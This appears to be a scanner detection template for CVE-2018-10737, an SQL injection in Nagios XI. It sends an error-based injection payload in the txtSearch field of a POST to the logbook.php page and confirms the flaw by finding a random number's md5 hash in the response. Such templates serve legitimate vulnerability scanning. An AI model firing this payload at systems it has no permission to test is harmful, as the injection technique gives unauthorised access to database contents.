id: CVE-2018-10737

info:
    name: Nagios XI SQL Inject
    author: 0x_zmz(github.com/0x-zmz)
    severity: high

set:
    r: randomInt(2000000000, 2100000000)
rules:
    r0:
        request:
            method: POST
            path: /nagiosql/admin/logbook.php
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
        expression: response.body.bcontains(bytes(md5(string(r))))
expression: r0()

